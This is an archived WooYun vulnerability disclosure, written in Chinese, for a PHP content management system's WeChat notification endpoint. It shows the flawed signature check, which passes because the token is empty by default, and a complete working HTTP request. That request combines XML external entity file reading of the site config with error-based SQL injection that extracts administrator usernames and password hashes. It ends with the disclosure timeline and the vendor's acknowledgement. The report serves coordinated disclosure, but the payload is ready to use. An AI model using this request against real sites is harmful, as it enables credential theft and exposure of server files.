乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-14: 细节已通知厂商并且等待厂商处理中 2015-01-16: 厂商已经确认,细节仅向厂商公开 2015-01-19: 细节向第三方安全合作伙伴开放 2015-03-12: 细节向核心白帽子及相关领域专家公开 2015-03-22: 细节向普通白帽子公开 2015-04-01: 细节向实习白帽子公开 2015-04-14: 细节向公众公开
rt。打包
app/weixin/notify.php
$wx=new weixin();if($wx->check_signature()){ //用于更改通知地址 if(isset($_GET["echostr"])) die($_GET["echostr"]); //被动响应消息和事件 response_msg();}function response_msg(){ global $dbm,$C; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if(!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $time = time(); //响应文本消息 $keyword = trim($postObj->Content); $textTpl = "<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[%s]]></MsgType> %s </xml>"; if(!empty($keyword)){ $msgType = "text"; $contentStr=''; //查询自动回复表 $rs=$dbm->query("select * from ".TB_PRE."weixin_auto_msg where find_in_set('".$keyword."',msg_key)"); if($rs['error']==''){ ...................................................... $contentStr='<Content><![CDATA['.$rs['error'].']]></Content>'; } $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr); echo $resultStr; }
一个典型的xml实体注入。看到check_signature()。class/weixin.class.php
public function check_signature(){ $signature = isset($_GET["signature"])?$_GET["signature"]:''; $timestamp = isset($_GET["timestamp"])?$_GET["timestamp"]:''; $nonce = isset($_GET["nonce"])?$_GET["nonce"]:''; $token = WX_TOKEN; $tmpArr = array($token, $timestamp, $nonce); sort($tmpArr,SORT_STRING); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } }
由于 WX_TOKEN 默认为空,所以我访问
/app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709
该程序安装时会强制要求用户改变后台路径,但是其路径会储存在 www/config/global.php里面。配合读取任意文件读取。完整的post包
POST /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: X-Forwarded-For: 127.x'.x.x.1Connection: keep-aliveContent-Type: text/xmlContent-Length: 377<?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">]><xml><ToUserName>&test;</ToUserName><Content>123',msg_key) and 1=updatexml(1,concat(0x5c,(select concat(login_name,0x5c,login_pass) from mcms_user where login_level='100')),1)#</Content></xml>
注入出了数据,同时读出了文件内容,将base64解码 即可得到后台路径
加强过滤~
危害等级:高
漏洞Rank:10
确认时间:2015-01-16 17:09
我们会尽快处理,谢谢支持
暂无